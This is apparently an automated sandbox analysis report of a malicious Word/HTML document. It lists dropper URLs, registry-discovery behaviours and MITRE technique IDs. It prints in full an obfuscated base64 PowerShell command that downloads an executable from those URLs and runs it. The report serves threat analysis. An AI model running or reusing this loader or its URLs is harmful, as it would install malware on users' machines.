e8ca6c66c79cca9404a9f6a6920ff02010dc799435381a97fd5c57cf0c3abb41

General

Target

Docs_4b3c7c2d6627b2a8dce9f1c50e08e144.html
Sample

191223-krt1zjpwke
SHA256

e8ca6c66c79cca9404a9f6a6920ff02010dc799435381a97fd5c57cf0c3abb41

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://xoso.thememanga.com/wp-admin/rqr/

exe.dropper

http://nuochoakichduc.info/wp-admin/HbS7j/

exe.dropper

http://nhasachthanhduy.com/master.class/zrJd/

exe.dropper

http://saphonzee.com/wp-includes/WdGrn8/

exe.dropper

https://tripaxi.com/All/Og86/

Signatures

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

4888 WINWORD.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WINWORD.EXE

pid process

4888 WINWORD.EXE
Process spawned unexpected child process 1 IoCs

Processes:

powershell.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 996 5036 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 996 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

996 powershell.exe

pid	process
4888	WINWORD.EXE

pid	process
4888	WINWORD.EXE

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	996	5036	powershell.exe

description	pid	process
Token: SeDebugPrivilege	996	powershell.exe

pid	process
996	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_4b3c7c2d6627b2a8dce9f1c50e08e144.html.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e JABpAEEARABvAEIAQgB3ACAAPQAgACcAOAAwACcAOwAkAG0AYwB3AEEARwBEAGMAeAA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB4AEQAQQBBACcALAAnAEEAQgAnACwAJwBrACcAKQA7ACQAawBBAHcAeABjAEEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGkAQQBEAG8AQgBCAHcAKwAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAuACcALAAnAGUAeABlACcAKQA7ACQAdQBBADQAQQBBAEEAQgBCAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBqACcALAAnAEEAXwBDAEEAMQAnACkAOwAkAEYAMQB4AFUAQQBBAD0AbgBlAFcALQBPAGAAQgBqAEUAYABDAFQAIAAoACcATgBlAHQALgBXAGUAJwArACcAYgAnACsAJwBDAGwAaQBlACcAKwAnAG4AJwArACcAdAAnACkAOwAkAHYAQQBaAFUARABBAEEAQwA9ACgAIgB7ADIAfQB7ADMAfQB7ADIAMgB9AHsAMwA4AH0AewA0ADEAfQB7ADIAOQB9AHsANAAzAH0AewA0ADQAfQB7ADkAfQB7ADEAMgB9AHsAMQA5AH0AewA4AH0AewAxAH0AewAyADgAfQB7ADMANQB9AHsAMQA4AH0AewAyADEAfQB7ADIANgB9AHsANAAwAH0AewAyADcAfQB7ADEAMAB9AHsANAAyAH0AewAzADAAfQB7ADMAMgB9AHsAMgA0AH0AewAwAH0AewAzADEAfQB7ADEANQB9AHsAMQA2AH0AewA2AH0AewA3AH0AewAxADQAfQB7ADEAMQB9AHsANAB9AHsAMQA3AH0AewAyADUAfQB7ADMAMwB9AHsAMQAzAH0AewAzADQAfQB7ADIAMwB9AHsANQB9AHsAMgAwAH0AewAzADkAfQB7ADMANgB9AHsAMwA3AH0AIgAgAC0AZgAgACcAbgB6ACcALAAnAGkAJwAsACcAaAB0AHQAcAAnACwAJwA6AC8ALwB4AG8AcwBvAC4AdAAnACwAJwBXAGQARwByAG4AJwAsACcALwAnACwAJwB3AHAALQBpAG4AYwAnACwAJwBsAHUAJwAsACcAbwBhAGsAaQBjAGgAZAB1AGMALgAnACwAJwBAAGgAJwAsACcAYwBvAG0AJwAsACcALwAnACwAJwB0AHQAcAA6AC8AJwAsACcAcwA6AC8ALwAnACwAJwBkAGUAcwAnACwAJwAuAGMAbwBtACcALAAnAC8AJwAsACcAOAAvACcALAAnAEgAYgBTADcAagAvAEAAaAB0AHQAcAAnACwAJwAvAG4AdQBvAGMAaAAnACwAJwBBAGwAbAAvAE8AJwAsACcAOgAvAC8AbgBoACcALAAnAGgAJwAsACcAcABhAHgAaQAuAGMAbwBtACcALAAnAHQAdABwADoALwAvAHMAYQBwAGgAbwAnACwAJwBAAGgAdAAnACwAJwBhAHMAYQBjAGgAdABoAGEAbgAnACwAJwB1AHkALgAnACwAJwBuAGYAbwAvAHcAcAAtAGEAJwAsACcAcAAtAGEAZAAnACwAJwBhAHMAdABlAHIALgBjAGwAYQBzAHMALwB6AHIAJwAsACcAZQBlACcALAAnAEoAZAAvAEAAaAAnACwAJwB0AHAAJwAsACcAdAByAGkAJwAsACcAZABtAGkAbgAvACcALAAnADYAJwAsACcALwAnACwAJwBlAG0AZQBtAGEAbgBnAGEALgBjAG8AbQAnACwAJwBnADgAJwAsACcAaABkACcALAAnAC8AdwAnACwAJwAvAG0AJwAsACcAbQBpACcALAAnAG4ALwByAHEAcgAvACcAKQAuACIAUwBwAGwAYABJAFQAIgAoACcAQAAnACkAOwAkAFcAdwBvAEEAQwBDAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBBAFgARABVACcALAAnAHIAJwAsACcAQwBEAFEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWQBjAFEAMQBfAHgAIABpAG4AIAAkAHYAQQBaAFUARABBAEEAQwApAHsAdAByAHkAewAkAEYAMQB4AFUAQQBBAC4AIgBEAGAAbwBgAFcATgBsAE8AYABBAGQAZgBJAEwAZQAiACgAJABZAGMAUQAxAF8AeAAsACAAJABrAEEAdwB4AGMAQQApADsAJABHAHcAXwB4AEEAUQBBAEIAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwBBAEMAWABBACcALAAnAEwAJwAsACcAbwBYAEEAJwApADsASQBmACAAKAAoAEcAZQBgAFQAYAAtAGkAVABFAE0AIAAkAGsAQQB3AHgAYwBBACkALgAiAGwARQBgAE4AZwB0AEgAIgAgAC0AZwBlACAAMwA2ADEAOQA4ACkAIAB7AGkATgBgAFYATwBLAGUALQBpAFQAYABFAG0AIAAkAGsAQQB3AHgAYwBBADsAJABpAFEAQgBVAEEAdwAxAFUAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACcARQAnACwAJwBaAEEAJwAsACcAQQBBADQAVQAnACkAOwBiAHIAZQBhAGsAOwAkAEgAawA0AGsAVQBDAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBCAGMAVQBCADQAQwAnACwAJwB6ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaAA0AEEAQgA0AEEAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcARABBACcALAAnAFQAXwBCAFEAJwApAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:996

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads